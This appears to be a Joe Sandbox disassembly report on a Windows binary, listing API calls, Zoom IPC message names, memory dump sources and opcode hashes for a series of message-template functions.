                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ReasonCode$StatusCode$com.zoom.app.cci.ccivideo.invitebyphonestatus.notify
                • API String ID: 3124793654-787523395
                • Opcode ID: 77b82cdc8bb6a92446dde56d643c1eafe211a6a69438a50c1253f56088a41386
                • Instruction ID: 543702142900076d1075883915107a901f0b00b402c5ea524d52706515e36780
                • Opcode Fuzzy Hash: 77b82cdc8bb6a92446dde56d643c1eafe211a6a69438a50c1253f56088a41386
                • Instruction Fuzzy Hash: 1AE022B2A04384BBFB00BB418889B3B7164EB80B08F90842CB2004A3C2CEF04C80D7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C729F7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.setvb.request,00009E8F,ImageLink,Type,00000004), ref: 00C72A17
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ImageLink$Type$com.zoom.app.cci.ccivideo.setvb.request
                • API String ID: 2703795933-209218483
                • Opcode ID: 5edeb33053173001194c771b2b680699055e0bf993c32d0a30e91ef7c2cdcbf9
                • Instruction ID: c90ffe2bd9d3d06fca83991bdd4716e3484206aa7d89dcea377e5effba209769
                • Opcode Fuzzy Hash: 5edeb33053173001194c771b2b680699055e0bf993c32d0a30e91ef7c2cdcbf9
                • Instruction Fuzzy Hash: F3E092B0A44399ABD710BB459C86B7A3164AB90B29F048428F1145B3E1CBF40D04EF75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C957
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant_app_stop,00009C42,ProcessID,ProcessName,00000004), ref: 00C6C977
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.zoom.app.assistant_app_stop
                • API String ID: 2715420528-856852631
                • Opcode ID: f0134983538e2dcd8473f76873f8f9e03e5ccbd8802106e0cda546bfa14caa2f
                • Instruction ID: fcfb34d3e5c8d5ff57f303e6850ea1713b535b71f7941d8857697773ba8f3179
                • Opcode Fuzzy Hash: f0134983538e2dcd8473f76873f8f9e03e5ccbd8802106e0cda546bfa14caa2f
                • Instruction Fuzzy Hash: 40E092B0A407956BE7106B465C56F2E75A4EB50B16F50442CF2005E3C1CEF40D04DF79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72937
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getsupportcountryinfo.response,00009E89,JsCallID,CountrysJson,00000004), ref: 00C72957
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: CountrysJson$JsCallID$com.zoom.app.cci.ccivideo.getsupportcountryinfo.response
                • API String ID: 9112088-914475299
                • Opcode ID: 30b9bb2b5af47d4e2b63a43ccfcee7a93eccde20fec7512e6f9aff2c5193689c
                • Instruction ID: 0a4cb8b7db0f91ccacb1a4a145fe03a972eedb23a810d8d0c56aada58debf228
                • Opcode Fuzzy Hash: 30b9bb2b5af47d4e2b63a43ccfcee7a93eccde20fec7512e6f9aff2c5193689c
                • Instruction Fuzzy Hash: 83E092B0B003857BEB10BB41A845B6E6664EF80B19F644518B2005B3E2CBF44C44C7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72AB7
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.audiochange.notify,00009E91,bUse,bMute,00000004), ref: 00C72AD7
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: bMute$bUse$com.zoom.app.cci.ccivideo.audiochange.notify
                • API String ID: 3124793654-3936263515
                • Opcode ID: c08bf01d22a685ed943562f5df09d6f2c0b21948dc6f4bbf225afc6998f9e11a
                • Instruction ID: a4ffb0fcf6aab3d16bed3ec36d79d3ac9d04fac8cc7cedd540a00881eca516df
                • Opcode Fuzzy Hash: c08bf01d22a685ed943562f5df09d6f2c0b21948dc6f4bbf225afc6998f9e11a
                • Instruction Fuzzy Hash: E5E092B0A403C97BEB20AB409C49B3A62A5AB90B19F548A19B1115A3D1CBF44C48D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76A67
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.notify.component.download_progress,0001388C,componentType,progress,00000004), ref: 00C76A87
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.notify.component.download_progress$componentType$progress
                • API String ID: 3124793654-2911181938
                • Opcode ID: 61cce8f296291597c050410beecfc2d7c6f3ff8bafee605938fe24f0cf407761
                • Instruction ID: a3c46efa84af2093e3acd39eb6075f7e9a581b12afb6d6e34051f08ae939fade
                • Opcode Fuzzy Hash: 61cce8f296291597c050410beecfc2d7c6f3ff8bafee605938fe24f0cf407761
                • Instruction Fuzzy Hash: 7CE092B1A50B84BBD7107B549C0AB2F6264EF85F59F40467CB1045A386CBF50E40D7B8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76A07
                • ??0?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.ps.notify.component.download_result,00013889,componentType,success,00000004), ref: 00C76A27
                  • Part of subcall function 00C889D0: __EH_prolog3.LIBCMT ref: 00C889D7
                  • Part of subcall function 00C889D0: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C888F2,?,?,?,?,00000004,00C88825,?,?,?,?,?), ref: 00C889EA
                  • Part of subcall function 00C90AF2: __EH_prolog3_GS.LIBCMT ref: 00C90AF9
                  • Part of subcall function 00C90AF2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B1F
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B4D
                  • Part of subcall function 00C90AF2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90B8A
                  • Part of subcall function 00C90AF2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,00009E1B,result,txChannelID,00000004), ref: 00C90BBA
                  • Part of subcall function 00C90AF2: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID,com.zoom.app.assistant.broadcast.unbind.channel.audio.response), ref: 00C90C18
                  • Part of subcall function 00C90AF2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6FFB7,com.zoom.app.assistant.broadcast.unbind.channel.audio.response,result,txChannelID), ref: 00C90C35
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.Zoom.ps.notify.component.download_result$componentType$success
                • API String ID: 3124793654-1950816445
                • Opcode ID: 6c2a75e6b47290fb1d1297914c820d66d77054fcc74a7b87665df1f47e793d5c
                • Instruction ID: e3d0f70f03fdb77aec0a398dcf746ccc117e2a97567866f8b7342696dc6b4a95
                • Opcode Fuzzy Hash: 6c2a75e6b47290fb1d1297914c820d66d77054fcc74a7b87665df1f47e793d5c
                • Instruction Fuzzy Hash: 35E092B0A40B847BD720BB484889B2E6264BB80B6AF50456CB1046A3D2CBF00E44D7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68A17
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.callcommand,0000271E,MeetingID,cmd,00000004), ref: 00C68A37
                  • Part of subcall function 00C85EF0: __EH_prolog3.LIBCMT ref: 00C85EF7
                  • Part of subcall function 00C85EF0: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85E52,?,?,?,?,00000004,00C85D95,?,?,?,?,?), ref: 00C85F0A
                  • Part of subcall function 00C84FAD: __EH_prolog3_GS.LIBCMT ref: 00C84FB4
                  • Part of subcall function 00C84FAD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C84FDA
                  • Part of subcall function 00C84FAD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85008
                  • Part of subcall function 00C84FAD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67557,com.zoom.app.outlook.get_data.request,RequestInfo,IPCAction,com.zoom.app.outlook.get_data.request,00009DA8,RequestInfo,IPCAction,00000004), ref: 00C85045
